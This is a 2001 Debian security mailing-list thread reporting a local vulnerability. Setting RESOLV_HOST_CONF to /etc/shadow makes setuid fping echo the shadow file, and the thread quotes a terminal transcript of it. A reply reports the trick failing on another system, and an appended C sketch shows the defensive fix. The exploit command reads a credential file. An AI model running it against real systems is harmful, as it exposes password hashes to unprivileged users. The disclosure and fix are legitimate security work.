
Re[2]: 'export RESOLV_HOST_CONF= any file you want' local vulnerability




When I tried it, I did not get the same results.

-rwsr-xr-x    1 root     root        19728 Oct 30  1999 /usr/bin/fping*

ldd `which fping`
        libc.so.6 => /lib/libc.so.6 (0x00127000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x00110000)

ping localhost
PING localhost (127.0.0.1): 56 data bytes

--- localhost ping statistics ---
6 packets transmitted, 0 packets received, 100% packet loss

fping localhost
localhost is unreachable




-- 
Kevin - cog@iwz.com



-- Original message --

> Since I've not had any response yet, I thought I'd give a demonstration of how
> nasty this is:

>   Script started on Mon Jan  8 17:48:23 2001
>   thomas@io:~$ export RESOLV_HOST_CONF=/etc/shadow
>   thomas@io:~$ ping localhost
>   PING localhost (127.0.0.1): 56 data bytes

>   --- localhost ping statistics ---
>   2 packets transmitted, 0 packets received, 100% packet loss
>   thomas@io:~$ fping localhost
>   /etc/shadow: line 1: bad command `root:<censored>:11063:0:99999:7:::'

>   [snip]

>   /etc/shadow: line 73: bad command `gdm:!:11285:0:99999:7:::'
>   localhost is unreachable
>   thomas@io:~$ ls -l `which fping`
>   -rwsr-xr-x    1 root     root        19728 May 15  2000 /usr/bin/fping
>   thomas@io:~$ ls -l `which ping`
>   -rwsr-xr-x    1 root     root        15036 Dec 31 04:11 /bin/ping
>   thomas@io:~$ ldd `which fping`
>         libc.so.6 => /lib/libc.so.6 (0x40021000)
>         /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
>   thomas@io:~$ ldd `which ping`
>         libc.so.6 => /lib/libc.so.6 (0x40021000)
>         /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
>   thomas@io:~$ exit

>   Script done on Mon Jan  8 17:49:42 2001

> It seems to work for some setuid programs, but not others.  I'm running the
> most recent packages from unstable as of today:

> ii  libc6          2.2-9          GNU C Library: Shared libraries and Timezone
> ii  netkit-ping    0.10-5         The ping utility from netkit
> ii  fping          2.2b1-2        Send ICMP ECHO_REQUEST packets to network ho

> cheers,

> Thomas


> On Mon, 8 Jan 2001, thomas lakofski wrote:

>> From: thomas lakofski <thomas@88.net>
>> To: security@debian.org, debian-security@lists.debian.org
>> Date: Mon, 8 Jan 2001 13:34:52 +0000 (GMT)
>> Subject: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
>>
>> Hi,
>>
>> A friend of mine just tried this against my unstable box and successfully
>> obtained the contents of /etc/shadow.
>>
>> I imagine that this is a problem in libc -- I'll leave it to
>> security@debian.org to file bug reports.
>>
>> cheers,
>>
>> Thomas
>>
>>
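
Added example, not part of the thread and not glibc's or fping's code: a C sketch of the defensive pattern this report calls for. A process whose effective IDs differ from its real IDs ignores an environment-supplied config path, and parse diagnostics never echo the offending line. The names conf_path, format_diag and running_privileged are hypothetical; /etc/host.conf is the file that RESOLV_HOST_CONF normally overrides.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEFAULT_CONF "/etc/host.conf"

/* True when the process holds more privilege than its invoker (setuid or
   setgid). In that state the environment is attacker-controlled input.
   glibc's secure_getenv(3) applies the same rule to a getenv() lookup. */
static int running_privileged(void) {
    return getuid() != geteuid() || getgid() != getegid();
}

/* Choose the config file. The override is honoured only when the process
   is not privileged. `privileged` is a parameter so both branches can be
   exercised without installing a setuid binary. */
const char *conf_path(const char *override, int privileged) {
    if (override != NULL && override[0] != '\0' && !privileged)
        return override;
    return DEFAULT_CONF;
}

/* Build a parse diagnostic that names the file and line number only.
   The content of the rejected line is deliberately left out, so a file
   opened with elevated rights is never printed back to the invoker. */
int format_diag(char *out, size_t n, const char *path, int lineno,
                const char *line) {
    (void)line; /* intentionally unused */
    return snprintf(out, n, "%s: line %d: bad command", path, lineno);
}

int main(void) {
    const char *path = conf_path(getenv("RESOLV_HOST_CONF"),
                                 running_privileged());
    char msg[256];
    /* Constructed sample line standing in for a rejected config entry. */
    format_diag(msg, sizeof msg, path, 1, "constructed:sample:entry");
    puts(msg);
    return 0;
}
```

Either control alone would have stopped the leak shown in the transcript: the override is dropped before the file is opened, and the diagnostic no longer carries file content.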



